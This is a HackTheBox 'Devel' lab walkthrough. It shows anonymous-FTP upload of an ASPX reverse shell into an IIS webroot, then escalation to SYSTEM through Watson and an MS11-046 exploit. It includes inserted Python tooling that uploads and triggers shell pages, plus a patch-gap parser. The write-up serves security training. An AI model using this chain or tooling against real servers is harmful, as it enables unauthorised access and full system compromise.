Devel HackTheBox Walkthrough

1. Enumeration

A standard nmap scan (e.g. `nmap -sC -sV 10.10.10.5`; the default scripts are what later report the anonymous FTP login) finds ports 21 (FTP) and 80 (HTTP) open. Let's start with port 80, as the web enumeration is the less complicated of the two!

Viewing http://10.10.10.5 (port 80) in the browser:

The image is a link; clicking it just sends you to Microsoft's IIS homepage, so the page itself gives nothing away!

Dirbuster with the medium directory wordlist finds nothing beyond the main page.

Searchsploit does not yield anything useful for this IIS version either!

Looks like port 80 on its own is a rabbit hole. That leaves port 21 to enumerate, which we will do following this cheat sheet:

http://www.lifeoverpentest.com/2018/02/enumeration-cheat-sheet-for-windows.html

The nmap results show that FTP anonymous login is allowed, so that is what we try next.

Oh and we are logged in!

And here is the list of commands we can use…

There is a put command, so we can perhaps write files; let's test it.

First we write "test" into test.txt, log in to FTP anonymously and put test.txt into the directory. Then we simply request it in the browser: if http://10.10.10.5/test.txt comes back with our content, the FTP root is the IIS webroot, and anonymous FTP gives us a write primitive straight into it.

Alright, it works!

2. Exploitation

IIS executes ASP/ASPX, so we can try uploading a reverse shell written in ASP or ASPX.

Here's the command to generate the aspx shell file; switch the format option to asp if an asp file is needed instead.

After a while the shell file is generated, and we repeat the earlier steps to put it in. Note that you might need to log in to FTP again because of the idle timeout!

And it’s in!
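The write test from the enumeration section and the shell upload above follow the same path (anonymous FTP put, then an HTTP request for the file), so both can be scripted and repeated. The script below is an added example, not code from the original walkthrough: it uploads a uniquely named marker over anonymous FTP and checks that IIS serves the same bytes back, which proves the FTP root is the webroot, and then uses the same upload-then-request path to drop and trigger the generated shell page. The host 10.10.10.5 is the box from the walkthrough; the `put`/`get` parameters (there so the logic can be exercised against fakes), the file names, and the assumption that the shell page came from msfvenom (`-p windows/shell_reverse_tcp -f aspx`, with a listener such as `nc -lvnp <port>` waiting) are mine.

```python
"""Added example: probe an anonymous-FTP root for IIS webroot write access,
then drop and trigger an ASP/ASPX page the same way.  Standard library only."""
import io
import os
import sys
import socket
import ftplib
import secrets
import urllib.error
import urllib.request

FTP_USER = "anonymous"
FTP_PASS = "anonymous@"   # any password is accepted for an anonymous login


def make_marker():
    """Unique file name and body, so a stale or cached page cannot fake a hit."""
    token = secrets.token_hex(8)
    return f"probe-{token}.txt", f"webroot-probe {token}\n".encode()


def ftp_put(host, name, data):
    """Anonymous login and STOR, i.e. the `put` from the walkthrough."""
    with ftplib.FTP(host, timeout=15) as ftp:
        ftp.login(FTP_USER, FTP_PASS)
        ftp.storbinary(f"STOR {name}", io.BytesIO(data))


def http_get(url):
    """Return (status, body).  A None status means the request never completed,
    which is exactly what a blocking reverse-shell page looks like from here."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:          # 404/500: the server answered
        return err.code, err.read()
    except (urllib.error.URLError, socket.timeout):
        return None, b""


def webroot_is_writable(host, put=ftp_put, get=http_get):
    """Upload a marker over FTP and confirm IIS serves the same bytes back."""
    name, data = make_marker()
    put(host, name, data)
    status, body = get(f"http://{host}/{name}")
    return status == 200 and body == data


def drop_and_trigger(host, remote_name, payload, put=ftp_put, get=http_get):
    """Upload a shell page and request it once so IIS executes it.
    Returns the HTTP status: 500 usually means the page failed to compile or
    threw; None means the request hung, the normal outcome for a reverse shell
    that is now connected back to the listener."""
    put(host, remote_name, payload)
    status, _ = get(f"http://{host}/{remote_name}")
    return status


if __name__ == "__main__":
    # usage: python3 ftp_webroot.py 10.10.10.5 [shell.aspx]
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.5"
    print("FTP root is the IIS webroot:", webroot_is_writable(target))
    if len(sys.argv) > 2:
        with open(sys.argv[2], "rb") as fh:
            payload = fh.read()
        remote = os.path.basename(sys.argv[2])
        print("trigger status:", drop_and_trigger(target, remote, payload))
```

Run the marker check first; only if it returns True is it worth uploading the shell page. Start the listener before the second run, since the triggering request is expected to hang (status None) once the shell connects back.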

Requesting the uploaded file in the browser makes IIS execute it, and over on my listener we can see the incoming connection.

However, it doesn't end there: the shell runs with the privileges of the IIS worker process, not as an administrator!

3. Privilege Escalation

First let's take a look at systeminfo to see if there is anything significant we need to look out for. There are no hotfixes installed at all ("Hotfix(s): N/A"), so this is an unpatched Windows 7 and a local privilege-escalation exploit is very likely to work.
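Rather than eyeballing the screenshot, the systeminfo output can be parsed for the facts the rest of this section depends on: the architecture (x86 here, which decides the Watson build platform and which exploit to compile), the OS version, and the installed hotfixes. The script below is an added example and is not part of the walkthrough or of Watson: it is Python, the two systeminfo samples are constructed (in the real `systeminfo` layout, modelled on an unpatched Windows 7 x86 host), and the bulletin-to-KB table holds the KB numbers from the Microsoft bulletins for the two privilege-escalation candidates named later in this section, MS11-046 (KB2503665) and MS13-005 (KB2778930).

```python
"""Added example: pull the privesc-relevant facts out of `systeminfo` output
(architecture, OS version, installed KBs) and flag bulletins whose KB is absent."""
import re
import sys

# Constructed sample in the real `systeminfo` layout: a Windows 7 x86 host
# with no hotfixes at all, like the target in this walkthrough.
SAMPLE_UNPATCHED = """\
Host Name:                 WIN7-LAB
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
System Type:               X86-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
"""

# Constructed sample of the same host after two updates, to show the
# multi-line hotfix layout that the parser has to fold together.
SAMPLE_PATCHED = """\
Host Name:                 WIN7-LAB
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               X86-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2503665
                           [02]: KB2999226
"""

# Bulletin -> KB that fixes it, taken from the Microsoft bulletins for the
# two candidates Watson reported in this walkthrough.  Extend as needed.
BULLETIN_KB = {
    "MS11-046": "KB2503665",
    "MS13-005": "KB2778930",
}


def parse_systeminfo(text):
    """Map each 'Key:  value' line to its value; indented continuation lines
    (hotfix list, NICs) are folded into the preceding key."""
    info, key = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        m = re.match(r"^(\S[^:]*):\s*(.*)$", line)
        if m and not line.startswith(" "):
            key = m.group(1).strip()
            info[key] = m.group(2).strip()
        elif key is not None:
            info[key] += "\n" + line.strip()
    return info


def hotfixes(info):
    """Installed KB numbers, or an empty list for 'Hotfix(s): N/A'."""
    return sorted(set(re.findall(r"KB\d+", info.get("Hotfix(s)", ""))))


def arch(info):
    """'x86' or 'x64' from 'System Type': the build platform for Watson and
    the choice between the x86 and x64 exploit sources."""
    system_type = info.get("System Type", "").lower()
    if "x64" in system_type:
        return "x64"
    if "x86" in system_type:
        return "x86"
    return "unknown"


def missing_bulletins(info):
    """Bulletins from BULLETIN_KB whose fixing KB is not installed."""
    installed = set(hotfixes(info))
    return sorted(b for b, kb in BULLETIN_KB.items() if kb not in installed)


def summarize(text):
    """One dict with everything the privesc steps need from systeminfo."""
    info = parse_systeminfo(text)
    return {
        "os": info.get("OS Name"),
        "version": info.get("OS Version"),
        "arch": arch(info),
        "hotfixes": hotfixes(info),
        "missing": missing_bulletins(info),
    }


if __name__ == "__main__":
    # usage: python3 sysinfo.py [systeminfo.txt]   (defaults to the sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_UNPATCHED
    for k, v in summarize(text).items():
        print(f"{k:>9}: {v}")
```

Save the target's `systeminfo` output to a file and feed it in; an empty hotfix list together with an `x86` architecture is the situation this walkthrough is in. Note that systeminfo does not report the installed .NET versions, which the Watson build needs separately.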

The Windows counterpart of linuxprivchecker is Watson, which checks the target for missing patches that correspond to known privilege-escalation bulletins.

https://github.com/rasta-mouse/Watson

However, Watson is a C# project that has to be built in Visual Studio, which our Kali machine does not have. Secondly, the current Watson does not support Windows 7, so we need to find the original release: Watson version 1 supports Windows 7, the same as the target machine (see the README.md file!).

First we need to find out which .NET Framework versions the target machine has installed, e.g. by listing C:\Windows\Microsoft.NET\Framework\ on the target, which has one folder per installed version.

Then on our host machine we open Watson.sln in Visual Studio (make sure the .NET development workload is installed).

Under Watson Properties (Project > Watson Properties) we set the target framework to the newest .NET Framework present on the target machine, which is .NET Framework 3.5. Building against a newer framework than the target has gives an executable that will not start there.

Then, under Build > Configuration Manager… we set the Watson project's platform to x86, matching the System Type in the systeminfo output from our enumeration earlier.

Once that is done, we simply build Watson (Build > Build Watson)

Now we need to transfer files to the target machine. To do this we use Impacket's smbserver.py script.

So I share my files through the SMB server (e.g. `smbserver.py share /path/to/files`), which the target can reach as \\<attacker IP>\share.

To run Watson.exe, we simply call it by its UNC path, \\<IP>\share\<path to the executable>, as shown in the screenshot above. Running it straight from the share means nothing has to be written to the target's disk.

Watson reports a total of 5 vulnerabilities!

MS11-046 and MS13-005 both allow us to escalate privileges, so let's start with MS11-046.

Searchsploit has two exploits for it written in C, and we use the x86 one since the target machine is x86.

The usage is given in the source: once compiled we get an executable which, when run on the target, should give us a privileged shell. Let's cross-compile it on our host machine (mingw-w64, i.e. i686-w64-mingw32-gcc for an x86 target) and transfer it over SMB again.

So we have the executable file ready

And we are SYSTEM, the Windows equivalent of root!

User.txt and root.txt!

The difficult part of this machine is the privilege escalation, since there is quite a lot to do: finding the first version of Watson, and modifying the build settings so that it runs on the target. Nonetheless, now that we have done it, we have another weapon in our hacking arsenal, so it's a huge win!

Till next machine!
